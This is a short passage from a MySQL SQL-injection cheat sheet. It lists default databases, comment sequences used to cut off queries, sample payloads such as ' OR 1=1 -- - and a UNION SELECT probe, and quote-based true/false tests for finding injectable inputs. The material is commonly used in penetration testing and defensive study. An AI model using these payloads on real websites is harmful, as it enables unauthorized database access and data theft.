I would like to thank .mario, Reiners and everyone else who has helped me inmaking this document what it is today. You can reach me at twitter.com/LightOSwith any suggestions you may have and remember this is still a work in progress,so be sure to check in frequently for updates.
MySQL
Default Databases
•
mysql
(Privileged)
•
information_schema
(Version >= 5)Comment Out Query
•
#
•
/*
•
-- -
•
;%00
•
`
Example:
•
' OR 1=1 -- -' ORDER BY id;
•
' UNION SELECT 1, 2, 3`
Note:
The backtick can only be used to end a query when used as an alias.
Testing Injection
•
False
o
The query is invalid (MySQL errors/missing content on website)
•
True
o
The query is valid (content is displayed as usual)Strings
•
' - False
•
'' - True
•
" - False
•
"" - True
•
\
-
False
•
\\
-
True
Add a Comment